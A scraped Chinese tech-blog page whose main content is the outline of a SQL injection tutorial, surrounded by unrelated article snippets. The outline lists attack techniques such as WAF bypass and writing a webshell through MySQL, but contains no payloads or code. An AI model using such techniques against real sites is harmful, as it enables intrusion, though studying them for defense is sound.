大家读完觉得有帮助记得关注和点赞！！！网络安全智能体（AISecurityAgent）是人工智能与网络安全融合的新范式，通过自主感知、分析决策、联动响应实现动态防护，正在重构传统“人防为主”的安全体系。以下从工作原理、架构设计、行业案例三方面进行深度解析：一、工作原理：三层认知闭环与动态进化1.核心能力分层（L1-L5标准）等级能力特征代表产品L1基础辅助型单步推理，处理预定义任务（如告警初判）9
26、网络安全与故障排查：OpenVPN与iptables的综合应用 y7z8a9 网络安全 iptables
网络安全与故障排查：OpenVPN与iptables的综合应用1.OpenVPN安全与配置1.1OpenVPN服务器加固OpenVPN服务器是网络的入口，因此加固服务器并保护其免受攻击至关重要。可以采取以下步骤来加固服务器：-安装操作系统的最小服务器版本，不安装任何不必要的软件。-禁用所有不必要的服务。-仅保留系统中必要的用户。-撤销不再需要访问权限的用户的证书（如清单9-8所示）。-使用双因素认
零基础学后端-PHP语言（第二期-PHP基础语法）（通过php内置服务器运行php文件）恰薯条的屑海鸥 php零基础学习 php 开发语言后端 php入门 php服务器 php文件运行
经过上期的配置，我们已经有了php的开发环境，编辑器我们继续使用VScode，如果是新来的朋友可以看这期文章来配置VScode零基础学前端-传统前端开发（第一期-开发软件介绍与本系列目标）（VScode安装教程）_vscode启动前端详细步骤-CSDN博客（本系列不过多介绍php的vscode插件，没有插件也是可以用的，只是打代码的速度慢一点）接下来我们来了解php的语法看过我之前网络安全-皮卡丘
从零起步：30岁转行网络安全的实战指南程序员罗知知 web安全网络安全 sql 数据库 apache 零基础
从零起步：30岁转行网络安全的实战指南当你决定在30岁转行进入网络安全领域，那感觉就像突然跳进了深不见底的大海，既兴奋又有点怕水。但别担心，这条路上并不孤单。下面，咱就聊聊怎么一步步走向成功。转型之初的迷茫与方向认清自我是第一步。得知道自己到底对哪块感兴趣，是想搞渗透测试，还是更喜欢安全开发？比如我对Linux和编程特别着迷，于是选择了渗透测试作为切入点。接着就是学习资源的选择。网络上信息多得让人
CTF入门教程（非常详细）从零基础入门到竞赛，看这一篇就够了！网络安全宇哥 web安全安全网络网络安全安全架构
一、CTF简介CTF（CaptureTheFlag）中文一般译作夺旗赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今，已经成为全球范围网络安全圈流行的竞赛形式，2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地，DEFCONCT
#渗透测试#网络安全#一文了解什么是中间件！！！独行soc 一文了解网络安全 web安全网络安全漏洞挖掘面试中间件架构
免责声明本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章读。目录一、什么是中间件中间件的定义中间件的功能中间件的分类二、中间件技术的发展趋势三、中间件在云上的应用四、云中间件高可用性实现方法五、云中间件集群管理最佳实践六、云中间件性能监控指标详解七、提
如何用ruby来写hadoop的mapreduce并生成jar包 wudixiaotie mapreduce
ruby来写hadoop的mapreduce，我用的方法是rubydoop。怎么配置环境呢： 1.安装rvm：不说了网上有 2.安装ruby：由于我以前是做ruby的，所以习惯性的先安装了ruby，起码调试起来比jruby快多了。 3.安装jruby： rvm install jruby然后等待安
java编程思想 -- 访问控制权限百合不是茶 java 访问控制权限单例模式
访问权限是java中一个比较中要的知识点,它规定者什么方法可以访问,什么不可以访问一:包访问权限; 自定义包: package com.wj.control; //包 public class Demo { //定义一个无参的方法 public void DemoPackage(){ System.out.println("调用
[生物与医学]请审慎食用小龙虾 comsci 生物
现在的餐馆里面出售的小龙虾,有一些是在野外捕捉的,这些小龙虾身体里面可能带有某些病毒和细菌,人食用以后可能会导致一些疾病,严重的甚至会死亡..... 所以,参加聚餐的时候,最好不要点小龙虾...就吃养殖的猪肉,牛肉,羊肉和鱼,等动物蛋白质
org.apache.jasper.JasperException: Unable to compile class for JSP: 商人shang maven 2.2 jdk1.8
环境： jdk1.8 maven tomcat7-maven-plugin 2.0 原因： tomcat7-maven-plugin 2.0 不知吃 jdk 1.8，换成 tomcat7-maven-plugin 2.2就行，即 <plugin>
你的垃圾你处理掉了吗?GC oloz GC
前序:本人菜鸟，此文研究学习来自网络，各位牛牛多指教　 1.垃圾收集算法的核心思想　　Java语言建立了垃圾收集机制，用以跟踪正在使用的对象和发现并回收不再使用(引用)的对象。该机制可以有效防范动态内存分配中可能发生的两个危险：因内存垃圾过多而引发的内存耗尽，以及不恰当的内存释放所造成的内存非法引用。　　垃圾收集算法的核心思想是：对虚拟机可用内存空间，即堆空间中的对象进行识别
shiro 和 SESSSION 杨白白 shiro
shiro 在web项目里默认使用的是web容器提供的session，也就是说shiro使用的session是web容器产生的，并不是自己产生的，在用于非web环境时可用其他来源代替。在web工程启动的时候它就和容器绑定在了一起，这是通过web.xml里面的shiroFilter实现的。通过session.getSession()方法会在浏览器cokkice产生JESSIONID，当关闭浏览器，此
移动互联网终端淘宝客如何实现盈利小桔子移動客戶端淘客淘寶App
2012年淘宝联盟平台为站长和淘宝客带来的分成收入突破30亿元，同比增长100%。而来自移动端的分成达1亿元，其中美丽说、蘑菇街、果库、口袋购物等App运营商分成近5000万元。可以看出，虽然目前阶段PC端对于淘客而言仍旧是盈利的大头，但移动端已经呈现出爆发之势。而且这个势头将随着智能终端(手机，平板)的加速普及而更加迅猛
wordpress小工具制作 aichenglong wordpress 小工具
wordpress 使用侧边栏的小工具，很方便调整页面结构小工具的制作过程 1 在自己的主题文件中新建一个文件夹(如widget)，在文件夹中创建一个php(AWP_posts-category.php) 小工具是一个类,想侧边栏一样，还得使用代码注册，他才可以再后台使用，基本的代码一层不变 <?php class AWP_Post_Category extends WP_Wi
JS微信分享 AILIKES js
// 所有功能必须包含在 WeixinApi.ready 中进行 WeixinApi.ready(function(Api) { // 微信分享的数据 var wxData = { &nb
封装探讨百合不是茶 JAVA面向对象封装
//封装属性方法将某些东西包装在一起，通过创建对象或使用静态的方法来调用，称为封装；封装其实就是有选择性地公开或隐藏某些信息，它解决了数据的安全性问题，增加代码的可读性和可维护性在 Aname类中申明三个属性，将其封装在一个类中：通过对象来调用例如 1： //属性将其设为私有姓名 name 可以公开
jquery radio/checkbox change事件不能触发的问题 bijian1013 JavaScript jquery
我想让radio来控制当前我选择的是机动车还是特种车，如下所示： <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"><
AngularJS中安全性措施 bijian1013 JavaScript AngularJS 安全性 XSRF JSON漏洞
在使用web应用中，安全性是应该首要考虑的一个问题。AngularJS提供了一些辅助机制，用来防护来自两个常见攻击方向的网络攻击。一.JSON漏洞当使用一个GET请求获取JSON数组信息的时候（尤其是当这一信息非常敏感，
[Maven学习笔记九]Maven发布web项目 bit1129 maven
基于Maven的web项目的标准项目结构 user-project user-core user-service user-web src
【Hive七】Hive用户自定义聚合函数(UDAF) bit1129 hive
用户自定义聚合函数，用户提供的多个入参通过聚合计算(求和、求最大值、求最小值)得到一个聚合计算结果的函数。问题：UDF也可以提供输入多个参数然后输出一个结果的运算，比如加法运算add(3，5)，add这个UDF需要实现UDF的evaluate方法,那么UDF和UDAF的实质分别究竟是什么？ Double evaluate(Double a, Double b)
通过 nginx-lua 给 Nginx 增加 OAuth 支持 ronin47
前言：我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算，阅读下面的文档，实现自动化并获得收益。SeatGeek 在过去几年中取得了发展，我们已经积累了不少针对各种任务的不同管理接口。我们通常为新的展示需求创建新模块，比如我们自己的博客、图表等。我们还定期开发内部工具来处理诸如部署、可视化操作及事件处理等事务。在处理这些事务中，我们使用了几个不同的接口来认证： &n
利用tomcat-redis-session-manager做session同步时自定义类对象属性保存不上的解决方法 bsr1983 session
在利用tomcat-redis-session-manager做session同步时，遇到了在session保存一个自定义对象时，修改该对象中的某个属性，session未进行序列化，属性没有被存储到redis中。在 tomcat-redis-session-manager的github上有如下说明： Session Change Tracking As noted in the &qu
《代码大全》表驱动法-Table Driven Approach-1 bylijinnan java 算法
关于Table Driven Approach的一篇非常好的文章： http://www.codeproject.com/Articles/42732/Table-driven-Approach package com.ljn.base; import java.util.Random; public class TableDriven { public
Sybase封锁原理 chicony Sybase
昨天在操作Sybase IQ12.7时意外操作造成了数据库表锁定，不能删除被锁定表数据也不能往其中写入数据。由于着急往该表抽入数据，因此立马着手解决该表的解锁问题。无奈此前没有接触过Sybase IQ12.7这套数据库产品，加之当时已属于下班时间无法求助于支持人员支持，因此只有借助搜索引擎强大的
java异常处理机制 CrazyMizzz java
java异常关键字有以下几个，分别为 try catch final throw throws 他们的定义分别为 try： Opening exception-handling statement. catch： Captures the exception. finally： Runs its code before terminating
hive 数据插入DML语法汇总 daizj hive DML 数据插入
Hive的数据插入DML语法汇总1、Loading files into tables语法：1) LOAD DATA [LOCAL] INPATH 'filepath' [OVERWRITE] INTO TABLE tablename [PARTITION (partcol1=val1, partcol2=val2 ...)]解释：1)、上面命令执行环境为hive客户端环境下： hive>l
工厂设计模式 dcj3sjt126com 设计模式
使用设计模式是促进最佳实践和良好设计的好办法。设计模式可以提供针对常见的编程问题的灵活的解决方案。工厂模式工厂模式（Factory）允许你在代码执行时实例化对象。它之所以被称为工厂模式是因为它负责“生产”对象。工厂方法的参数是你要生成的对象对应的类名称。 Example #1 调用工厂方法（带参数） <?phpclass Example{
mysql字符串查找函数 dcj3sjt126com mysql
FIND_IN_SET(str,strlist) 假如字符串str 在由N 子链组成的字符串列表strlist 中，则返回值的范围在1到 N 之间。一个字符串列表就是一个由一些被‘,’符号分开的自链组成的字符串。如果第一个参数是一个常数字符串，而第二个是type SET列，则 FIND_IN_SET() 函数被优化，使用比特计算。如果str不在strlist 或st
jvm内存管理 easterfly jvm
一、JVM堆内存的划分分为年轻代和年老代。年轻代又分为三部分：一个eden,两个survivor。工作过程是这样的：e区空间满了后，执行minor gc，存活下来的对象放入s0, 对s0仍会进行minor gc，存活下来的的对象放入s1中，对s1同样执行minor gc，依旧存活的对象就放入年老代中；年老代满了之后会执行major gc，这个是stop the word模式，执行
CentOS-6.3安装配置JDK-8 gengzg centos
JAVA_HOME=/usr/java/jdk1.8.0_45 JRE_HOME=/usr/java/jdk1.8.0_45/jre PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib export JAVA_HOME
【转】关于web路径的获取方法 huangyc1210 Web 路径
假定你的web application 名称为news,你在浏览器中输入请求路径： http://localhost:8080/news/main/list.jsp 则执行下面向行代码后打印出如下结果： 1、 System.out.println(request.getContextPath()); //可返回站点的根路径。也就是项
php里获取第一个中文首字母并排序远去的渡口数据结构 PHP
很久没来更新博客了，还是觉得工作需要多总结的好。今天来更新一个自己认为比较有成就的问题吧。最近在做储值结算，需求里结算首页需要按门店的首字母A-Z排序。我的数据结构原本是这样的： Array ( [0] => Array ( [sid] => 2885842 [recetcstoredpay] =&g
java内部类 hm4123660 java 内部类匿名内部类成员内部类方法内部类
　在Java中，可以将一个类定义在另一个类里面或者一个方法里面，这样的类称为内部类。内部类仍然是一个独立的类，在编译之后内部类会被编译成独立的.class文件，但是前面冠以外部类的类名和$符号。内部类可以间接解决多继承问题,可以使用内部类继承一个类，外部类继承一个类，实现多继承。 &nb
Caused by: java.lang.IncompatibleClassChangeError: class org.hibernate.cfg.Exten zhb8015
maven pom.xml关于hibernate的配置和异常信息如下，查了好多资料，问题还是没有解决。只知道是包冲突，就是不知道是哪个包....遇到这个问题的分享下是怎么解决的。。 maven pom: <dependency> <groupId>org.hibernate</groupId> <ar
Spark 性能相关参数配置详解－任务调度篇 Stark_Summer spark cache cpu 任务调度 yarn
随着Spark的逐渐成熟完善, 越来越多的可配置参数被添加到Spark中来, 本文试图通过阐述这其中部分参数的工作原理和配置思路, 和大家一起探讨一下如何根据实际场合对Spark进行配置优化。由于篇幅较长，所以在这里分篇组织，如果要看最新完整的网页版内容，可以戳这里：http://spark-config.readthedocs.org/，主要是便
css3滤镜 wangkeheng html css
经常看到一些网站的底部有一些灰色的图标，鼠标移入的时候会变亮，开始以为是js操作src或者bg呢，搜索了一下，发现了一个更好的方法：通过css3的滤镜方法。 html代码： <a href='' class='icon'><img src='utv.jpg' /></a> css代码： .icon{-webkit-filter: graysc

Web安全之SQL注入总结

第一篇 基础篇

1 SQL注入介绍

2 数据库特性

MySQL与MSSQL及ACCESS之间的区别

String concatenation 字符串串联

Comments 注释

Database version 数据库类型和版本

Database contents 数据库内容

Conditional errors 条件错误

Batched (or stacked) queries 批处理（或堆叠）查询

Time delays 时间延迟

第二篇 实战篇

2.1 SQL注入分类

2.2 手工注入流程

1.判断注入点

2.获取字段数

3.显示位使用联合注入

4.数据库内容查询

2.3 Mysql注入类型详解

1 报错注入

2盲注

3 多语句注入

4 内联注入

5 宽字节注入

6 二次编码注入

7 HTTP头注入

8 伪静态

2.4 过WAF技巧

2.5 SQL注入防御

第三篇 Mysql详解

1 文件写入

2 高权限跨库注入

3 写入webshell

利用Union select 写入

利用分隔符写入

利用log写入

第四篇 SQL Server详解

1.利用错误消息提取信息

(1)枚举当前表及列

(2)利用数据类型错误提取数据

2.获取元数据

3 Oeder by与union select

4 存储过程

5 动态执行

你可能感兴趣的:(网络安全)

第一篇基础篇

第二篇实战篇